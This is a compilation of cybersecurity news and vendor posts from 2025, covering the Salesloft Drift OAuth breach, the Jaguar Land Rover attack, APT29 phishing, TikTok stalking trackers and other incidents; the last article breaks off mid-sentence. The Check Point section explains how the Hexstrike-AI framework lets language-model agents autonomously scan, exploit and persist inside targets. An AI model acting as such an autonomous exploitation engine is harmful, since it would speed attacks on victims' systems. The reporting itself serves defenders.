A Primer on Forensic Investigation of Salesforce Security Incidents
salesforce.com Eoghan Casey August 27, 2025 Learn how to detect, investigate, and respond to Salesforce security incidents with logs, permissions, and backups. A guide to investigating Salesforce security incidents with logs, permissions, and backups to strengthen response and resilience. I am increasingly asked by customers how to investigate potential security incidents in their Salesforce environments. Common questions are: What did a specific user do during that time? and What data was impacted? Every organization and incident is unique, and the answer to these questions depends on the specific situation, but there is some general guidance I can provide. Three key sources of information for investigating a security incident in Salesforce environments are activity logs, user permissions, and backup data.
Jaguar Land Rover production severely hit by cyber attack
bbc.com Chris VallanceSenior Technology Reporter andTheo Leggett International Business Correspondent 3.09.2025 Staff were sent home and the company shut down its IT systems in an effort to minimise the damage done. A cyber-attack has "severely disrupted" Jaguar Land Rover (JLR) vehicle production, including at its two main UK plants. The company, which is owned by India's Tata Motors, said it took immediate action to lessen the impact of the hack and is working quickly to restart operations. JLR's retail business has also been badly hit at a traditionally a popular time for consumers to take delivery of a new vehicle - but there is no evidence any customer data had been stolen, it said. The attack began on Sunday as the latest batch of new registration plates became available on Monday, 1 September. The BBC understands that the attack was detected while in progress, and the company shut down its IT systems in an effort to minimise any damage. Workers at the company's Halewood plant in Merseyside were told by email early on Monday morning not to come into work while others were sent home, as first reported by the Liverpool Echo. The BBC understands the attack has also hit JLR's other main UK manufacturing plant at Solihull, with staff there also sent home. The company said: "We took immediate action to mitigate its impact by proactively shutting down our systems. We are now working at pace to restart our global applications in a controlled manner." It added: "At this stage there is no evidence any customer data has been stolen but our retail and production activities have been severely disrupted." It is not yet known who is responsible for the hack, but it follows crippling attacks on prominent UK retail businesses including Marks & Spencer and the Co-op. In both cases, the hackers sought to extort money. While JLR's statement makes no mention of a cyber-attack, a separate filing by parent company Tata Motors to the Bombay Stock Exchange referred to an "IT security incidence" causing "global" issues. The National Crime Agency said: "We are aware of an incident impacting Jaguar Land Rover and are working with partners to better understand its impact." In 2023, as part of an effort to "accelerate digital transformation across its business", JLR signed a five-year, £800m deal with corporate stablemate Tata Consultancy Services to provide cybersecurity and a range of other IT services. The halt in production is a fresh blow to the firm which recently revealed a slump in profits attributed to increasing in costs caused by US tariffs.
Zscaler, Palo Alto Networks, SpyCloud among the affected by Salesloft Drift breach - Help Net Security
helpnetsecurity.com Zeljka Zorz, Editor-in-Chief, Help Net Security September 2, 2025 Zscaler, Palo Alto Networks, PagerDuty, Tanium, and SpyCloud say their Salesforce instances were accessed following the Salesloft breach. The companies noted that attackers had only limited access to Salesforce databases, not to other systems or resources. They warned, however, that the stolen customer data could be used for convincing phishing and social engineering attacks. The Salesloft breach Salesloft is the company behind a popular sales engagement platform of the same name. The company’s Drift application – an AI chat agent – can be integrated with many third-party platforms and tools, including Salesforce. On August 26, Salesloft stated that from August 8 to August 18, 2025, attackers used compromised OAuth credentials to exfiltrate data from the Salesforce instances of customers that have set up the Drift-Saleforce integration. Several days later, the Google Threat Intelligence Group (GTIG) confirmed that the compromise impacted other integrations, as well. “On August 28, 2025, our investigation confirmed that the actor also compromised OAuth tokens for the ‘Drift Email’ integration. On August 9, 2025, a threat actor used these tokens to access email from a very small number of Google Workspace accounts,” GTIG analysts shared. Astrix Security researchers have confirmed that the attackers used the Drift Email OAuth application for Google Workspace to exfiltrate emails and that – at least in one case – they tried to access S3 buckets whose names have been likely extracted from compromised Salesforce environments. Similarly, WideField threat researchers have observed suspicious log event activity across multiple customers using its security platform, pointing to attackers rifling through Salesforce databases and Gmail accounts. Salesloft breach victims Zscaler How UNC6395 accessed emails (Source: WideField) Zscaler, Palo Alto Networks and the other companies mentioned above are just some of the 700+ companies impacted by this breach. While the stolen customer information can be valuable, GTIG analysts say that the attackers were focused on searching for AWS access keys, passwords, and Snowflake-related access tokens, which can (and likely have been) further misused by the attackers. What to do if your organization is on the victims list? Salesloft has yet to reveal how the attackers managed to get their hands on the OAuth tokens they used, but the company has engaged cybersecurity experts from (Google’s) Mandiant and Coalition to help them investigate and remediate the compromise. “We are recommending that all Drift customers who manage their own Drift connections to third-party applications via API key, proactively revoke the existing key and reconnect using a new API key for these applications. This only relates to API key-based Drift integrations. OAuth applications are being handled directly by Salesloft,” the company said on August 27, and outlined the process for updating the API keys. Salesforce has, for the moment, disabled all integrations between Salesforce and Salesloft technologies, including the Drift app. “Disabling the connection is a precautionary measure to help safeguard customer environments while we continue to assess and address the situation. We recognize this change may cause disruption and will provide further updates as more information becomes available,” the company noted. Likewise, Google has disabled the integration functionality between Google Workspace and Salesloft Drift pending further investigation, and has advised organizations to “review all third-party integrations connected to their Drift instance, revoke and rotate credentials for those applications, and investigate all connected systems for signs of unauthorized access.” Google Mandiant incident responders have provided extensive advice on how organizations can investigate for compromise and scan for exposed secrets and hardcoded credentials. Astrix researchers have shared additional indicators of compromise and described AWS-specific activity to look out for. WideField threat analysts have provided guidance useful to both their customers and other affected organizations.
blog.checkpoint.com ByAmit Weigman | Office of the CTO September 2, 2025 Researchers analyze Hexstrike-AI, a next-gen AI orchestration framework linking LLMs with 150+ security tools—now repurposed by attackers to weaponize Citrix NetScaler zero-day CVEs in minutes. Key Findings: Newly released framework called Hexstrike-AI provides threat actors with an orchestration “brain” that can direct more than 150 specialized AI agents to autonomously scan, exploit, and persist inside targets. Within hours of its release, dark web chatter shows threat actors attempting to use HexStrike-AI to go after a recent zero day CVEs, with attackers dropping webshells for unauthenticated remote code execution. These vulnerabilities are complex and require advanced skills to exploit. With Hextrike-AI, threat actors claim to reduce the exploitation time from days to under 10 minutes. From Concept to Reality A recent executive insight blog examined the idea of a “brain” behind next-generation cyber attacks: an orchestration and abstraction layer coordinating large numbers of specialized AI agents to launch complex operations at scale. That architecture was already beginning to appear in offensive campaigns, signaling a shift in how threat actors organize and execute attacks. The emergence of Hexstrike-AI now provides the clearest embodiment of that model to date. This tool was designed to be a defender-oriented framework: “a revolutionary AI-powered offensive security framework that combines professional security tools with autonomous AI agents to deliver comprehensive security testing capabilities”, their website reads. In this context, Hexstrike-AI was positioned as a next-generation tool for red teams and security researchers. But almost immediately after release, malicious actors began discussing how to weaponize it. Within hours, certain underground channels discussed application of the framework to exploit the Citrix NetScaler ADC and Gateway zero-day vulnerabilities disclosed last Tuesday (08/26). This marks a pivotal moment: a tool designed to strengthen defenses has been claimed to be rapidly repurposed into an engine for exploitation, crystallizing earlier concepts into a widely available platform driving real-world attacks. Figure 1: Dark web posts discussing HexStrike AI, shortly after its release. The Architecture of Hexstrike-AI Hexstrike-AI is not “just another red-team framework.” It represents a fundamental shift in how offensive cyber operations can be conducted. At its heart is an abstraction and orchestration layer that allows AI models like Claude, GPT, and Copilot to autonomously run security tooling without human micromanagement. Figure 2: HexStrike AI MCP Toolkit. More specifically, Hexstrike AI introduces MCP Agents, an advanced server that bridges large language models with real-world offensive capabilities. Through this integration, AI agents can autonomously run 150+ cyber security tools spanning penetration testing, vulnerability discovery, bug bounty automation, and security research. Think of it as the conductor of an orchestra: The AI orchestration brain interprets operator intent. The agents (150+ tools) perform specific actions; scanning, exploiting, deploying persistence, exfiltrating data. The abstraction layer translates vague commands like “exploit NetScaler” into precise, sequenced technical steps that align with the targeted environment. This mirrors exactly the concept described in our recent blog: an orchestration brain that removes friction, decides which tools to deploy, and adapts dynamically in real time. We analyzed the source code and architecture of Hexstrike-AI and revealed several important aspects of its design: MCP Orchestration Layer The framework sets up a FastMCP server that acts as the communication hub between large language models (Claude, GPT, Copilot) and tool functions. Tools are wrapped with MCP decorators, exposing them as callable components that AI agents can invoke. This is the orchestration core; it binds the AI agent to the underlying security tools, so commands can be issued programmatically. Tool Integration at Scale Hexstrike-AI incorporates core network discovery and exploitation tools, beginning with Nmap scanning and extending to dozens of other reconnaissance, exploitation, and persistence modules. Each tool is abstracted into a standardized function, making orchestration seamless. Figure 3: the nmap_scan tool is exposed as an MCP function. Here, AI agents can call nmap_scan with simple parameters. The abstraction removes the need for an operator to run and parse Nmap manually — orchestration handles execution and results. Automation and Resilience The client includes retry logic and recovery handling to keep operations stable, even under failure conditions. This ensures operations continue reliably, a critical feature when chaining scans, exploits, and persistence attempts. Figure 4: Hexstrike-AI’s automated resilience loop Intent-to-Execution Translation High-level commands are abstracted into workflows. The execute_command function demonstrates this. Here, an AI agent provides only a command string, and Hexstrike-AI determines how to execute it, turning intent into precise, repeatable tool actions. Figure 5: Hexstrike-AI’s execute_command function. Why This Matters Right Now The release of Hexstrike-AI would be concerning in any context, because its design makes it extremely attractive to attackers. But its impact is amplified by timing. Last Tuesday (08/26), Citrix disclosed three zero-day vulnerabilities affecting NetScaler ADC and NetScaler Gateway appliances, as follows: CVE-2025-7775 – Unauthenticated remote code execution. Already exploited in the wild, with webshells observed on compromised appliances. CVE-2025-7776 – A memory-handling flaw impacting NetScaler’s core processes. Exploitation not yet confirmed, but high-risk. CVE-2025-8424 – An access control weakness on management interfaces. Also unconfirmed in the wild but exposes critical control paths. Exploiting these vulnerabilities is non-trivial. Attackers must understand memory operations, authentication bypasses, and the peculiarities of NetScaler’s architecture. Such work has historically required highly skilled operators and weeks of development. With Hexstrike-AI, that barrier seems to have collapsed. In underground forums over the 12 hours following the disclosure of the said vulnerabilities, we have observed threat actors discussing the use of Hexstrike-AI to scan for and exploit vulnerable NetScaler instances. Instead of painstaking manual development, AI can now automate reconnaissance, assist with exploit crafting, and facilitate payload delivery for these critical vulnerabilities. Figure 6: Top Panel: Dark web post claiming to have successfully exploited the latest Citrix CVE’s using HexStrike AI, originally in Russian; Bottom Panel: Dark web post translated into English using Google Translate add-on. Certain threat actors have also published vulnerable instances they have been able to scan using the tool, which are now being offered for sale. The implications are profound: A task that might take a human operator days or weeks can now be initiated in under 10 minutes. Exploitation can be parallelized at scale, with agents scanning thousands of IPs simultaneously. Decision-making becomes adaptive; failed exploit attempts can be automatically retried with variations until successful, increasing the overall exploitation yield. The window between disclosure and mass exploitation shrinks dramatically. CVE-2025-7775 is already being exploited in the wild, and with Hexstrike-AI, the volume of attacks will only increase in the coming days. Figure 7: Seemingly vulnerable NetScaler instances curated by HexStrike AI. Action Items for Defenders The immediate priority is clear: patch and harden affected systems. Citrix has already released fixed builds, and defenders must act without delay. In our technical vulnerability report, we have listed technical measures and actions defenders should take against these CVEs, mostly including hardening authentications, restricting access and threat hunting for the affected webshells. However, Hexstrike-AI represents a broader paradigm shift, where AI orchestration will increasingly be used to weaponize vulnerabilities quickly and at scale. To defend against this new class of threat, organizations must evolve their defenses accordingly: Adopt adaptive detection: Static signatures and rules will not suffice. Detection systems must ingest fresh intelligence, learn from ongoing attacks, and adapt dynamically. Integrate AI-driven defense: Just as attackers are building orchestration layers, defenders must deploy AI systems capable of correlating telemetry, detecting anomalies, and responding autonomously at machine speed. Shorten patch cycles: When the time-to-exploit is measured in hours, patching cannot be a weeks-long process. Automated patch validation and deployment pipelines are essential. Threat intelligence fusion: Monitoring dark web discussions and underground chatter is now a critical defensive input. Early signals, such as the chatter around Hexstrike-AI and NetScaler CVEs, provide vital lead time for professionals. Resilience engineering: Assume compromise. Architect systems with segmentation, least privilege, and robust recovery capabilities so that successful exploitation does not equate to catastrophic impact. Conclusion Hexstrike-AI is a watershed moment. What was once a conceptual architecture – a central orchestration brain directing AI agents – has now been embodied in a working tool. And it is already being applied against active zero days. For defenders, we can only reinforce what has already been said in our last post: urgency in addressing today’s vulnerabilities, and foresight in preparing for a future where AI-driven orchestration is the norm. The sooner the security community adapts, patching faster, detecting smarter, a...
TikTok Shop propose un simili AirTag pour espionner vos proches...
clubic.com Par Alexandre Boero, Journaliste-reporter, responsable de l'actu. Publié le 01 septembre 2025 à 08h04 La plateforme TikTok Shop commercialise des trackers GPS qui ressemblent au fameux AirTag d'Apple depuis des vidéos virales qui encouragent l'espionnage de ses proches ou de son ou sa partenaire. Les ventes dépasseraient déjà les 100 000 unités. La marketplace de TikTok héberge des vendeurs de dispositifs de géolocalisation de type AirTag. Les commerçants opèrent leurs ventes à l'aide d'arguments publicitaires qui incitent directement à surveiller secrètement son partenaire. Des vidéos aux millions de vues, des dizaines de milliers de ventes, et une modération défaillante malgré les alertes ont été signalées aux États-Unis. Si la plateforme chinoise affirme interdire ces contenus, elle peine visiblement à les supprimer, ce qui contribue à normaliser les comportements abusifs sur le célèbre réseau social. Des vidéos à plusieurs millions de vues normalisent sur TikTok l'espionnage conjugal D'après l'enquête menée récemment par 404 Media, les vendeurs de trackers GPS assument totalement leur positionnement toxique. « Si ta copine dit qu'elle sort juste avec des amies tous les soirs, tu ferais mieux d'en coller un sur sa voiture », peut-on entendre dans une vidéo vue des millions de fois. Le dispositif, carrément présenté comme indétectable contrairement aux AirTags, fait miroiter aux potentiels acheteurs une surveillance mondiale, grâce à la carte SIM intégrée. Les interactions sous ces publications sont d'ailleurs symptomatiques. Un utilisateur confie dans les commentaires : « J'en ai acheté et les ai mis sur les voitures de filles que je trouve attirantes à la salle de sport. » Oui, c'est flippant, surtout lorsque le vendeur répond avec désinvolture par un émoji rieur. D'après les métriques de TikTok Shop, l'un des traceurs s'est vendu à plus de 32 500 exemplaires, quand un autre affiche quasiment 100 000 unités écoulées. Eva Galperin, co-fondatrice de la Coalition Against Stalkerware, la coalition contre les logiciels espions, est dépitée. « C'est tout bonnement présenté comme un outil d'abus. » Elle explique que tout dispositif justifié par « attraper son partenaire en train de tromper » facilite le contrôle coercitif. Le pire, c'est que les vidéos multiplient les prétextes pour essayer de toucher plus d'utilisateurs, comme une méfiance conjugale, les références à Coldplay et à l'ex-patron d'Astronomer piégé par une kiss cam, le tout avec des accroches comme « les hommes avec des femmes infidèles, vous pourriez en vouloir un ». TikTok supprime quelques vidéos mais le problème persiste Questionné par 404 Media, TikTok a supprimé certaines vidéos et banni un compte, en ajoutant interdire « les contenus qui encouragent la surveillance secrète ». Pourtant, au lendemain de la réponse, le média a déniché des vidéos identiques, qui restaient accessibles. Dès qu'un utilisateur clique sur l'une de ces vidéos, l'algorithme de TikTok Shop lui recommande des produits similaires, notamment des enregistreurs audio secrets vendus avec les mêmes arguments toxiques. Aux États-Unis, d'où lesdites vidéos ont été publiées, onze États interdisent explicitement le tracking GPS dans leurs lois anti-harcèlement, et quinze considèrent comme illégale la surveillance véhiculaire sans consentement. Les vendeurs jouent sur l'ambiguïté. Certains vont même jusqu'à manier l'ironie dans leur vidéo : « C'est illégal de tracer les gens ? Je ne sais pas, je ne suis pas avocat, mais vous aurez probablement des problèmes ». On n'arrête pas les progrès, mais surtout les dérives.
Cloudflare hit by data breach in Salesloft Drift supply chain attack
bleepingcomputer.com By Sergiu Gatlan September 2, 2025 Cloudflare is the latest company impacted in a recent string of Salesloft Drift breaches, part of a supply-chain attack disclosed last week. The internet giant revealed on Tuesday that the attackers gained access to a Salesforce instance it uses for internal customer case management and customer support, which contained 104 Cloudflare API tokens. Cloudflare was notified of the breach on August 23, and it alerted impacted customers of the incident on September 2. Before informing customers of the attack, it also rotated all 104 Cloudflare platform-issued tokens exfiltrated during the breach, even though it has yet to discover any suspicious activity linked to these tokens. "Most of this information is customer contact information and basic support case data, but some customer support interactions may reveal information about a customer's configuration and could contain sensitive information like access tokens," Cloudflare said. "Given that Salesforce support case data contains the contents of support tickets with Cloudflare, any information that a customer may have shared with Cloudflare in our support system—including logs, tokens or passwords—should be considered compromised, and we strongly urge you to rotate any credentials that you may have shared with us through this channel." The company's investigation found that the threat actors stole only the text contained within the Salesforce case objects (including customer support tickets and their associated data, but no attachments) between August 12 and August 17, after an initial reconnaissance stage on August 9. These exfiltrated case objects contained only text-based data, including: The subject line of the Salesforce case The body of the case (which may include keys, secrets, etc., if provided by the customer to Cloudflare) Customer contact information (for example, company name, requester's email address and phone number, company domain name, and company country) "We believe this incident was not an isolated event but that the threat actor intended to harvest credentials and customer information for future attacks," Cloudflare added. "Given that hundreds of organizations were affected through this Drift compromise, we suspect the threat actor will use this information to launch targeted attacks against customers across the affected organizations." Wave of Salesforce data breaches Since the start of the year, the ShinyHunters extortion group has been targeting Salesforce customers in data theft attacks, using voice phishing (vishing) to trick employees into linking malicious OAuth apps with their company's Salesforce instances. This tactic enabled the attackers to steal databases, which were later used to extort victims. Since Google first wrote about these attacks in June, numerous data breaches have been linked to ShinyHunters' social engineering tactics, including those targeting Google itself, Cisco, Qantas, Allianz Life, Farmers Insurance, Workday, Adidas, as well as LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co. While some security researchers have told BleepingComputer that the Salesloft supply chain attacks involve the same threat actors, Google has found no conclusive evidence linking them. Palo Alto Networks also confirmed over the weekend that the threat actors behind the Salesloft Drift breaches stole some support data submitted by customers, including contact info and text comments. The Palo Alto Networks incident was also limited to its Salesforce CRM and, as the company told BleepingComputer, it did not affect any of its products, systems, or services. The cybersecurity company observed the attackers searching for secrets, including AWS access keys (AKIA), VPN and SSO login strings, Snowflake tokens, as well as generic keywords such as "secret," "password," or "key," which could be used to breach more cloud platforms to steal data in other extortion attacks.
Spanish government cancels €10m contract using Huawei equipment
therecord.media | The Record from Recorded Future News September 1st, 2025 Last week, a contract worth €10 million ($11.7 million) had been awarded to the Spanish multinational Telefónica to use Huawei kit to upgrade the RedIRIS network, effectively more than 16,000km of infrastructure. On Friday, the government reversed course for “reasons of digital strategy and strategic autonomy,” as reported by El País. The RedIRIS upgrade using Huawei equipment had been negotiated directly with Telefónica as the company had an existing €5.5 million contract from 2020 to boost the network. The Ministry of Digital Transformation argued the new upgrade was urgent due to the demands of new digital services, supercomputing projects and the network’s connections to Spain’s defense establishment. It was partially driven by a need to improve the RedIRIS network’s resilience to cyberattacks, despite concerns that the use of equipment provided by Chinese vendors could increase the risk of cyberattacks to Western infrastructure. These fears are often expressed in the context of Beijing’s offensive cyber espionage activities and China’s National Intelligence Law of 2017, which allows the state to “compel anyone in China to do anything,” as summarized by Britain’s National Cyber Security Centre. Huawei has consistently argued that such criticisms are illegitimate. The company is currently restricted from most 5G networks across the European Union, although Spain has opted out of imposing such restrictions, and faces varying levels of bans in networks of NATO allies such as the United States and the United Kingdom. Despite the apparent political hesitation regarding restricting Huawei equipment, Spain was among more than a dozen allies who last week warned about Chinese companies compromising global critical infrastructure. The cancellation of the Telefoníca contract comes amid alarm from Madrid’s allies about the prevalence of the Chinese company’s equipment within the Spanish telecommunications infrastructure, including the core of Telefoníca’s 5G network. In July, the chairs of the U.S. House and Senate Intelligence panels asked the country’s spy chief to scrutinize any intelligence information the U.S. shares with Spain after the disclosure the country’s wiretap system is underpinned by Huawei technology. Spanish Prime Minister Pedro Sánchez, who has been among the EU’s most supportive leaders regarding Huawei, has pushed back against the bloc’s efforts to restrict it from 5G networks. Huawei has opened research facilities in Madrid and is a major employer as a technology contractor for a number of public administrations. Natasha Buckley, a researcher at RUSI and lecturer in cybersecurity at Cranfield University, previously told Recorded Future News that Spain’s approach to the company stood in stark contrast to that of other NATO allies and many EU member states. “Spain’s stance on high-risk technology vendors places greater emphasis on supply chain reliability than on geopolitical considerations, setting it apart from more restrictive approaches seen in countries like the UK, the Netherlands and Poland. “While the EU’s 5G Cybersecurity Toolbox recommends limiting or excluding high-risk Chinese suppliers like Huawei, Spain’s implementation has been uneven. Huawei is restricted from some public 5G projects, yet its servers have been approved to store sensitive police wiretap data. The result is a case-by-case approach that falls short of a clearly defined policy towards high-risk vendors,” Buckley said.
U.S. Government Seizes Online Marketplaces Selling Fraudulent Identity Documents Used in Cybercrime Schemes
justice.gov District of New Mexico | U.S. Government Seizes Online Marketplaces Selling Fraudulent Identity Documents Used in Cybercrime Schemes | United States Department of Justice Thursday, August 28, 2025 The operators of VerifTools produced and sold counterfeit driver’s licenses, passports, and other identification documents that could be used to bypass identity verification systems and gain unauthorized access to online accounts. ALBUQUERQUE – The U.S. Attorney’s Office for the District of New Mexico announced today the seizure of two marketplace domains and one blog used to sell fraudulent identity documents to cybercriminals worldwide. The operators of VerifTools produced and sold counterfeit driver’s licenses, passports, and other identification documents that could be used to bypass identity verification systems and gain unauthorized access to online accounts. The Federal Bureau of Investigation (FBI) began investigating in August 2022 after discovering a conspiracy to use stolen identity information to access cryptocurrency accounts. The investigation revealed that VerifTools offered counterfeit identification documents for all 50 U.S. states and multiple foreign countries for as little as nine dollars, payable in cryptocurrency. The FBI used the VerifTools marketplace to generate and purchase counterfeit New Mexico driver’s licenses, which were paid for with cryptocurrency. The FBI has identified the equivalent of approximately $6.4 million of illicit proceeds linked to the VerifTools marketplace. The following counterfeit documents are an example of New Mexico driver’s licenses obtained from VerifTools. “The internet is not a refuge for criminals. If you build or sell tools that let offenders impersonate victims, you are part of the crime,” said Acting U.S. Attorney Ryan Ellison. “We will use every lawful tool to disrupt your business, take the profit out of it, and bring you to justice. No one operation is bigger than us together. With our partners at every level of law enforcement we will protect New Mexicans and defend those who stand up for our community.” "The removal of this marketplace is a major step in protecting the public from fraud and identity theft crime," said Philip Russell, Acting Special Agent in Charge of the FBI Albuquerque Division. "Together with our partners, we will continue to target and dismantle the platforms that criminals depend on, no matter where they operate." Acting U.S. Attorney Ryan Ellison and Acting Special Agent in Charge Philip Russell of the FBI’s Albuquerque Field Office made the announcement today. The FBI’s Albuquerque Field Office investigated this case. The Justice Department’s Office of International Affairs provided valuable assistance. The Justice Department collaborated closely with investigators and prosecutors from multiple jurisdictions in this investigation, including the District of New Mexico, Eastern District of Virginia, the Dutch National Police and the Netherlands Public Prosecution Service.
Google URL Shortener links will no longer be available [updated] - Google Developers Blog
developers.googleblog.com JULY 18, 2024 Sumit Chandel Developer Relations Engineer Understand how you will be impacted by our decision to turn off the serving portion of Google URL Shortener. Updated August 1, 2025: While we previously announced discontinuing support for all goo.gl URLs after August 25, 2025, we've adjusted our approach in order to preserve actively used links. We understand these links are embedded in countless documents, videos, posts and more, and we appreciate the input received. Nine months ago, we redirected URLs that showed no activity in late 2024 to a message specifying that the link would be deactivated in August, and these are the only links targeted to be deactivated. If you get a message that states, “This link will no longer work in the near future”, the link won't work after August 25 and we recommend transitioning to another URL shortener if you haven’t already. All other goo.gl links will be preserved and will continue to function as normal. To check if your link will be retained, visit the link today. If your link redirects you without a message, it will continue to work. In 2018, we announced the deprecation and transition of Google URL Shortener because of the changes we’ve seen in how people find content on the internet, and the number of new popular URL shortening services that emerged in that time. This meant that we no longer accepted new URLs to shorten but that we would continue serving existing URLs. Over time, these existing URLs saw less and less traffic as the years went on - in fact more than 99% of them had no activity in the last month. As such, we will be turning off Google URL Shortener. Please read on below to understand more about how this may impact you. Who is impacted? Any developers using links built with the Google URL Shortener in the form https://goo.gl/* will be impacted, and these URLs will no longer return a response after August 25th, 2025. We recommend transitioning these links to another URL shortener provider. Note that goo.gl links generated via Google apps (such as Maps sharing) will continue to function. What to expect Starting August 23, 2024, goo.gl links will start displaying an interstitial page for a percentage of existing links notifying your users that the link will no longer be supported after August 25th, 2025 prior to navigating to the original target page. Over time the percentage of links that will show the interstitial page will increase until the shutdown date. This interstitial page should help you track and adjust any affected links that you will need to transition as part of this change. We will continue to display this interstitial page until the shutdown date after which all links served will return a 404 response. Note that the interstitial page may cause disruptions in the current flow of your goo.gl links. For example, if you are using other 302 redirects, the interstitial page may prevent the redirect flow from completing correctly. If you’ve embedded social metadata in your destination page, the interstitial page will likely cause these to no longer show up where the initial link is displayed. For this reason, we advise transitioning these links as soon as possible. Note: In the event the interstitial page is disrupting your use cases, you can suppress it by adding the query param “si=1” to existing goo.gl links. We understand the transition away from using goo.gl short links may cause some inconvenience. If you have any questions or concerns, please reach out to us at Firebase Support. Thank you for using the service and we hope you join us in moving forward into new and innovative ways for navigating web and app experiences.
Salesloft Drift Supply Chain Incident: Key Details and Zscaler’s
zscaler.com August 30, 2025 Zscaler swiftly mitigates a security incident impacting Salesloft Drift, and ensuring robust protection against potential vulnerabilities. At Zscaler, protecting your data and maintaining transparency are core to our mission to secure, simplify and accelerate businesses transformation. We are committed to keeping you informed about key developments that may impact your organization. What Happened? Zscaler was made aware of a campaign targeted at Salesloft Drift (marketing software-as-a-service) and impacting a large number of Salesforce customers. This incident involved the theft of OAuth tokens connected to Salesloft Drift, a third-party application used for automating sales workflows that integrates with Salesforce databases to manage leads and contact information. The scope of the incident is confined to Salesforce and does not involve access to any of Zscaler's products, services or underlying systems and infrastructure. As part of this campaign, unauthorized actors gained access to Salesloft Drift credentials of its customers including Zscaler. Following a detailed review as part of our ongoing investigation, we have determined that these credentials have allowed limited access to some Zscaler Salesforce information. What Information May Be Affected? The information accessed was limited to commonly available business contact details for points of contact and specific Salesforce related content, including: Names Business email addresses Job titles Phone numbers Regional/location details Zscaler product licensing and commercial information Plain text content from certain support cases [this does NOT include attachments, files, and images] After extensive investigation, Zscaler has currently found no evidence to suggest misuse of this information. If anything changes, we will provide further communications and updates. What Did Zscaler Do? Zscaler acted swiftly to address the incident and mitigate risks. Steps taken include: Revoking Salesloft Drift’s access to Zscaler’s Salesforce data Out of an abundance of caution, rotating other API access tokens. Launching a detailed investigation into the scope of the event, working closely with Salesforce to assess and understand impacts as they continue investigating. Implementing additional safeguards and strengthening protocols to defend against similar incidents in the future. Immediately launched a third party risk management investigation for third party vendors used by Zscaler. Zscaler Customer Support team has further strengthened customer authentication protocol when responding to customer calls to safeguard against potential phishing attacks. What You Can Do Although the incident’s scope remains limited (as stated above) and no evidence of misuse has been found, we recommend that customers maintain heightened vigilance. Please be wary of potential phishing attacks or social engineering attempts, which could leverage exposed contact details. Given that other organizations have suffered similar incidents stemming from Salesloft Drift, it’s crucial to exercise caution regarding unsolicited communications, including emails, phone calls, or requests for sensitive information. Always verify the source of communication and never disclose passwords or financial data via unofficial channels. Zscaler Support will never request authentication or authorization details through unsolicited outreach, including phone calls or SMS. All official Zscaler communications come from trusted Zscaler channels. Please exercise caution and report any suspicious phishing activity to security@zscaler.com.
OpenAI Says It's Scanning Users' ChatGPT Conversations and Reporting Content to the Police
futurism.com Aug 27, 5:05 PM EDT by Noor Al-Sibai OpenAI has authorized itself to call law enforcement if users say threatening enough things when talking to ChatGPT. Update: It looks like this may have been OpenAI's attempt to get ahead of a horrifying story that just broke, about a man who fell into AI psychosis and killed his mother in a murder-suicide. Full details here. For the better part of a year, we've watched — and reported — in horror as more and more stories emerge about AI chatbots leading people to self-harm, delusions, hospitalization, arrest, and suicide. As the loved ones of the people impacted by these dangerous bots rally for change to prevent such harm from happening to anyone else, the companies that run these AIs have been slow to implement safeguards — and OpenAI, whose ChatGPT has been repeatedly implicated in what experts are now calling "AI psychosis," has until recently done little more than offer copy-pasted promises. In a new blog post admitting certain failures amid its users' mental health crises, OpenAI also quietly disclosed that it's now scanning users' messages for certain types of harmful content, escalating particularly worrying content to human staff for review — and, in some cases, reporting it to the cops. "When we detect users who are planning to harm others, we route their conversations to specialized pipelines where they are reviewed by a small team trained on our usage policies and who are authorized to take action, including banning accounts," the blog post notes. "If human reviewers determine that a case involves an imminent threat of serious physical harm to others, we may refer it to law enforcement." That short and vague statement leaves a lot to be desired — and OpenAI's usage policies, referenced as the basis on which the human review team operates, don't provide much more clarity. When describing its rule against "harm [to] yourself or others," the company listed off some pretty standard examples of prohibited activity, including using ChatGPT "to promote suicide or self-harm, develop or use weapons, injure others or destroy property, or engage in unauthorized activities that violate the security of any service or system." But in the post warning users that the company will call the authorities if they seem like they're going to hurt someone, OpenAI also acknowledged that it is "currently not referring self-harm cases to law enforcement to respect people’s privacy given the uniquely private nature of ChatGPT interactions." While ChatGPT has in the past proven itself pretty susceptible to so-called jailbreaks that trick it into spitting out instructions to build neurotoxins or step-by-step instructions to kill yourself, this new rule adds an additional layer of confusion. It remains unclear which exact types of chats could result in user conversations being flagged for human review, much less getting referred to police. We've reached out to OpenAI to ask for clarity. While it's certainly a relief that AI conversations won't result in police wellness checks — which often end up causing more harm to the person in crisis due to most cops' complete lack of training in handling mental health situations — it's also kind of bizarre that OpenAI even mentions privacy, given that it admitted in the same post that it's monitoring user chats and potentially sharing them with the fuzz. To make the announcement all the weirder, this new rule seems to contradict the company's pro-privacy stance amid its ongoing lawsuit with the New York Times and other publishers as they seek access to troves of ChatGPT logs to determine whether any of their copyrighted data had been used to train its models. OpenAI has steadfastly rejected the publishers' request on grounds of protecting user privacy and has, more recently, begun trying to limit the amount of user chats it has to give the plaintiffs. Last month, the company's CEO Sam Altman admitted during an appearance on a podcast that using ChatGPT as a therapist or attorney doesn't confer the same confidentiality that talking to a flesh-and-blood professional would — and that thanks to the NYT lawsuit, the company may be forced to turn those chats over to courts. In other words, OpenAI is stuck between a rock and a hard place. The PR blowback from its users spiraling into mental health crises and dying by suicide is appalling — but since it's clearly having trouble controlling its own tech enough to protect users from those harmful scenarios, it's falling back on heavy-handed moderation that flies in the face of its own CEO's promises.
Amazon disrupts watering hole campaign by Russia’s APT29
aws.amazon.com by CJ Moses on 29 AUG 2025 Amazon’s threat intelligence team has identified and disrupted a watering hole campaign conducted by APT29 (also known as Midnight Blizzard), a threat actor associated with Russia’s Foreign Intelligence Service (SVR). Our investigation uncovered an opportunistic watering hole campaign using compromised websites to redirect visitors to malicious infrastructure designed to trick users into authorizing attacker-controlled devices through Microsoft’s device code authentication flow. This opportunistic approach illustrates APT29’s continued evolution in scaling their operations to cast a wider net in their intelligence collection efforts. The evolving tactics of APT29 This campaign follows a pattern of activity we’ve previously observed from APT29. In October 2024, Amazon disrupted APT29’s attempt to use domains impersonating AWS to phish users with Remote Desktop Protocol files pointed to actor-controlled resources. Also, in June 2025, Google’s Threat Intelligence Group reported on APT29’s phishing campaigns targeting academics and critics of Russia using application-specific passwords (ASPs). The current campaign shows their continued focus on credential harvesting and intelligence collection, with refinements to their technical approach, and demonstrates an evolution in APT29’s tradecraft through their ability to: Compromise legitimate websites and initially inject obfuscated JavaScript Rapidly adapt infrastructure when faced with disruption On new infrastructure, adjust from use of JavaScript redirects to server-side redirects Technical details Amazon identified the activity through an analytic 